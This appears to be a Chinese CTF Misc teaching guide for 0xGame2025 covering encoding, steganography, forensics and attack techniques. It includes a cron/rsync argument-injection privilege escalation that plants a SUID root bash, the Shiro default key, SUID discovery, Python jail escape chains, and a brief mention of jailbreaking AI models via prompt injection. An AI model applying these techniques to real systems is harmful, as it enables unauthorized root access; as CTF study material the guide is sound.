0xGame2025 CTF Misc赛道教学指南<\/h1>

前言<\/h2>
本教学文档基于0xGame2025 CTF Misc赛道的出题思路和解题方法整理而成，旨在帮助CTF初学者系统学习Misc方向的核心知识点。<\/p>

Week1 基础入门<\/h2>

1.1 编码基础<\/h3>

Base64编码<\/h4>

原理<\/strong>：将二进制数据转换为64个可打印字符（A-Z, a-z, 0-9, +, \/）<\/li>

编码过程<\/strong>：

将数据按3字节分组（24位）<\/li>
每组拆分为4个6位组<\/li>
每个6位组转换为十进制（0-63）<\/li>
根据Base64索引表对应字符<\/li> <\/ol> <\/li>
填充规则<\/strong>：不足3字节用0填充，输出用=表示填充<\/li>
特征识别<\/strong>：Zmxh<\/code>可能是"flag"的Base64编码<\/li> <\/ul> 凯撒密码<\/h4> 原理<\/strong>：字母表移位替换密码<\/li> 加密公式<\/strong>：密文字母 = (明文字母位置 + 偏移量) mod 26<\/code><\/li> 解密公式<\/strong>：明文字母 = (密文字母位置 - 偏移量 + 26) mod 26<\/code><\/li> 大小写处理<\/strong>：大写字母：A(65)-Z(90)<\/li> 小写字母：a(97)-z(122)<\/li> <\/ul> <\/li> 破解方法<\/strong>：爆破26种可能偏移量<\/li> <\/ul> 1.2 文件格式分析<\/h3> .docx文件结构<\/h4> 本质是ZIP压缩包格式<\/li> 遵循开放打包约定(OPC)<\/li> 可修改后缀为.zip解压查看内部文件<\/li> 重要目录：docProps\/<\/code>可能包含隐藏信息<\/li> <\/ul> 1.3 Linux基础命令<\/h3> SSH连接<\/strong>：ssh username@hostname -p port<\/code><\/li> 常用命令<\/strong>： whoami<\/code>：显示当前用户名<\/li> pwd<\/code>：显示当前工作目录<\/li> ls<\/code>：列出文件（参数：-a<\/code>显示隐藏文件，-l<\/code>显示详细信息）<\/li> cd<\/code>：切换目录<\/li> cat<\/code>：读取文件内容<\/li> su<\/code>：切换用户<\/li> <\/ul> <\/li> <\/ul> 1.4 图片隐写技术<\/h3> LSB隐写原理<\/h4> 基本概念<\/strong>：修改像素RGB值的最低有效位(LSB)<\/li> 存储格式<\/strong>：PNG通常使用RGB模式，每个通道范围0-255<\/li> 隐写影响<\/strong>：对画面视觉效果影响极小<\/li> 提取工具<\/strong>： Stegsolve：可视化工具，支持通道分析<\/li> Zsteg：命令行工具，自动检测隐写<\/li> <\/ul> <\/li> <\/ul> 使用方法（Stegsolve）：<\/h4> 导入图片<\/li> Analyse → Data Extract<\/li> 勾选RGB通道的LSB<\/li> 选择LSB First模式<\/li> Preview查看结果<\/li> <\/ol> Week2 进阶技能<\/h2> 2.1 自定义Base64<\/h3> 核心原理<\/strong>：Base64第4个字符的索引值 = 第3个输入字节的低6位（byte3 % 64）<\/li> 解题思路<\/strong>：通过对比明文密文反推自定义字符集<\/li> 工具差异<\/strong>：Python base64库遇到=停止，系统base64命令解码更灵活<\/li> <\/ul> 2.2 ZIP明文攻击<\/h3> 攻击条件<\/h4> 压缩方式为ZipCrypto加密<\/li> 已知8字节连续明文和对应偏移<\/li> 需要4字节明文验证密钥<\/li> <\/ol> 攻击步骤<\/h4> 使用bkcrack -L<\/code>查看压缩包信息<\/li> 准备已知明文（如PNG文件头）<\/li> 执行攻击：bkcrack -C encrypted.zip -c target_file -p known_plaintext<\/code><\/li> 使用获取的密钥解密<\/li> <\/ol> PNG文件头特征<\/h4> 魔数头：89 50 4E 47 0D 0A 1A 0A<\/code><\/li> IHDR块：00 00 00 0D 49 48 44 52<\/code><\/li> <\/ul> 2.3 Git泄露利用<\/h3> 关键文件<\/strong>：.git<\/code>文件夹包含版本历史<\/li> 恢复工具<\/strong>：GitTools中的gitdumper<\/code>和extractor<\/code><\/li> 解题步骤<\/strong>：下载.git文件夹：gitdumper http:\/\/target\/.git\/ repo<\/code><\/li> 提取历史文件：extractor repo output<\/code><\/li> 查看提交记录恢复删除文件<\/li> <\/ol> <\/li> <\/ul> 2.4 Shiro反序列化<\/h3> 漏洞原理<\/h4> Remember Me功能使用AES加密序列化数据<\/li> 默认密钥：kPH+bIxk5D2deZiIxcaaaA==<\/code><\/li> 数据流：Base64 → AES解密 → Java反序列化<\/li> <\/ul> 流量分析要点<\/h4> 查找HTTP流量中的rememberMe Cookie<\/li> 使用在线工具解密：https:\/\/potato.gold\/navbar\/tool\/shiro\/ShiroTool.html<\/li> 命令执行结果可能通过DNS隧道传输<\/li> <\/ul> 2.5 图片元数据修改<\/h3> 宽高修改方法<\/h4> PNG<\/strong>：修改IHDR块的width和height<\/li> JPG<\/strong>：修改SOF0段的宽高值<\/li> GIF<\/strong>：修改Logical Screen Descriptor<\/li> <\/ul> EXIF工具<\/h4> 使用exiftool查看和修改元数据<\/li> 命令：exiftool -参数图片文件<\/code><\/li> <\/ul> 2.6 区块链基础<\/h3> 解题要素<\/h4> RPC链地址（网络配置）<\/li> 合约地址<\/li> 测试币水龙头<\/li> 挑战合约代码<\/li> <\/ol> 操作流程<\/h4> 安装MetaMask插件<\/li> 添加自定义网络（链ID、RPC URL）<\/li> 导入私钥获取测试币<\/li> 使用Remix IDE编译部署合约<\/li> 与合约交互完成挑战<\/li> <\/ol> Week3 高级技术<\/h2> 3.1 AI提示词注入<\/h3> 目标<\/strong>：让AI跳出预设prompt限制<\/li> 方法<\/strong>：创造特殊情景诱导AI越狱<\/li> 应用<\/strong>：简单的AI安全测试题目<\/li> <\/ul> 3.2 内存修改技术<\/h3> Cheat Engine使用<\/h4> 运行游戏和Cheat Engine<\/li> 附加游戏进程<\/li> 扫描变化的值定位内存地址<\/li> 修改内存值达成目标<\/li> <\/ol> 其他工具<\/h4> x64dbg动态调试<\/li> IDA Pro逆向分析<\/li> <\/ul> 3.3 Base64绕过技巧<\/h3> Python与系统差异<\/h4> Python base64库：严格遵循规范，遇到=停止<\/li> 系统base64命令：灵活解码所有字符<\/li> <\/ul> 绕过方法<\/h4> 使用双Base64编码拼接<\/li> 利用echo命令特性（-n参数避免换行符）<\/li> <\/ul> 3.4 Linux提权技术<\/h3> SUID提权原理<\/h4> SUID程序以文件所有者权限运行<\/li> 查找命令：find \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/li> 常见SUID程序：dd、bash等<\/li> <\/ul> 资源网站<\/h4> GTFOBins：https:\/\/gtfobins.github.io\/<\/li> <\/ul> 3.5 BitLocker内存取证<\/h3> 密钥体系<\/h4> FVEK（全卷加密密钥）：直接加密数据<\/li> VMK（卷主密钥）：加密FVEK<\/li> 保护器：加密VMK（密码、TPM等）<\/li> <\/ol> 取证步骤<\/h4> 使用Volatility分析内存镜像<\/li> 识别Profile：volatility -f image.raw imageinfo<\/code><\/li> 提取FVEK：volatility --profile=Win7SP1x64 -f image.raw bitlocker<\/code><\/li> 使用dislocker解密： dislocker -v -V image.raw -k fvek.file --offset=<\/span>65536<\/span> dislocker-mount\/ <\/span><\/span>mount -o loop,ro dislocker-mount\/dislocker-file mount-point\/ <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.6 APNG隐写<\/h3> 文件结构<\/h4> 基于PNG格式，增加fcTL块控制动画<\/li> 关键字段：delay_num（延时）、dispose_op（帧处理）<\/li> 可进行时间轴隐写<\/li> <\/ul> 解题工具<\/h4> Python apng库处理帧提取<\/li> Stegsolve分析LSB隐写<\/li> OurSecret工具处理深层隐写<\/li> <\/ul> Week4 实战应用<\/h2> 4.1 NTFS日志分析<\/h3> $LogFile作用<\/h4> 记录元数据操作（创建、删除、重命名等）<\/li> 不记录文件实际内容<\/li> 系统权限要求高，难以篡改<\/li> <\/ul> 分析方法<\/h4> 使用Autopsy或7z提取$LogFile<\/li> 使用日志分析工具解析<\/li> 查询重命名操作： SELECT<\/span> lf_UsnJrlTimestamp, lf_UsnJrlReason, lf_FileName <\/span><\/span>FROM<\/span> LogFile <\/span><\/span>WHERE<\/span> lf_UsnJrlReason LIKE<\/span> '%RENAME%'<\/span> <\/span><\/span>ORDER<\/span> BY<\/span> lf_LSN; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 渗透提权实战<\/h3> 定时任务利用<\/h4> 查看\/etc\/cron.d\/目录<\/li> 分析root权限的定时任务<\/li> 利用rsync的--rsync-path参数劫持： touch -- --rsync-path=<\/span>sh\ <\/span>shell.sh <\/span><\/span>echo -e '#!\/bin\/bash\ncp \/bin\/bash \/tmp\/rootbash\nchmod 4777 \/tmp\/rootbash'<\/span> > shell.sh <\/span><\/span><\/code><\/pre><\/li> <\/ol> SUID绕过<\/h4> Bash安全机制：SUID运行时降级权限<\/li> 使用-p参数保留权限：.\/rootbash -p<\/code><\/li> <\/ul> 4.3 CRC32爆破攻击<\/h3> 攻击原理<\/h4> ZIP元数据中存储原始文件CRC32校验码<\/li> 小文件（≤4字节）可暴力破解内容<\/li> 结合明文攻击获取加密密钥<\/li> <\/ul> 攻击条件<\/h4> 压缩方式为ZipCrypto<\/li> 目标文件原始大小较小<\/li> 已知CRC32值<\/li> <\/ul> 4.4 Python Jail逃逸<\/h3> 逃逸方法<\/h4> 构建对象继承链： ''<\/span>.<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() <\/span><\/span><\/code><\/pre><\/li> 查找可利用类（如os._wrap_close）<\/li> 调用危险函数执行命令<\/li> <\/ol> 文件描述符利用<\/h4> 通过\/proc\/pid\/fd\/读取已打开文件<\/li> 绕过权限检查（open过程验证权限）<\/li> 读取方法： import<\/span> os <\/span><\/span>os.<\/span>lseek(4<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>print(os.<\/span>read(4<\/span>, 90000<\/span>).<\/span>decode('utf-8'<\/span>, errors=<\/span>'ignore'<\/span>)) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 学习建议<\/h2> 工具使用原则<\/h3> 理解原理后再使用自动化工具<\/li> 重要比赛优先使用可靠工具<\/li> 掌握多种解决方案以备不时之需<\/li> <\/ol> AI使用规范<\/h3> 作为学习辅助而非替代思考<\/li> 理解AI给出的解决方案<\/li> 记录学习过程和思考路径<\/li> <\/ol> 持续学习路径<\/h3> 以赛代学，参加各类CTF比赛<\/li> 建立技术博客记录解题过程<\/li> 寻找学习伙伴共同进步<\/li> 关注前沿技术和新型漏洞<\/li> <\/ol> 结语<\/h2> 本教学文档涵盖了0xGame2025 Misc赛道的主要知识点，从基础编码到高级取证技术，旨在为CTF初学者提供系统的学习路径。建议结合实际题目练习，逐步提升技能水平。<\/p>

0xGame2025 CTF Misc赛道教学指南<\/h1>

前言<\/h2> 本教学文档基于0xGame2025 CTF Misc赛道的出题思路和解题方法整理而成，旨在帮助CTF初学者系统学习Misc方向的核心知识点。<\/p>

Week1 基础入门<\/h2>

1.1 编码基础<\/h3>

1.2 文件格式分析<\/h3>

1.4 图片隐写技术<\/h3>

Week2 进阶技能<\/h2>

2.2 ZIP明文攻击<\/h3>

2.4 Shiro反序列化<\/h3>

2.5 图片元数据修改<\/h3>

2.6 区块链基础<\/h3>

Week3 高级技术<\/h2>

3.2 内存修改技术<\/h3>

3.3 Base64绕过技巧<\/h3>

3.4 Linux提权技术<\/h3>

3.5 BitLocker内存取证<\/h3>

3.6 APNG隐写<\/h3>

Week4 实战应用<\/h2>

4.1 NTFS日志分析<\/h3>

4.2 渗透提权实战<\/h3>

4.3 CRC32爆破攻击<\/h3>

4.4 Python Jail逃逸<\/h3>

学习建议<\/h2>

结语<\/h2> 本教学文档涵盖了0xGame2025 Misc赛道的主要知识点，从基础编码到高级取证技术，旨在为CTF初学者提供系统的学习路径。建议结合实际题目练习，逐步提升技能水平。<\/p>

前言<\/h2>
本教学文档基于0xGame2025 CTF Misc赛道的出题思路和解题方法整理而成，旨在帮助CTF初学者系统学习Misc方向的核心知识点。<\/p>

结语<\/h2>
本教学文档涵盖了0xGame2025 Misc赛道的主要知识点，从基础编码到高级取证技术，旨在为CTF初学者提供系统的学习路径。建议结合实际题目练习，逐步提升技能水平。<\/p>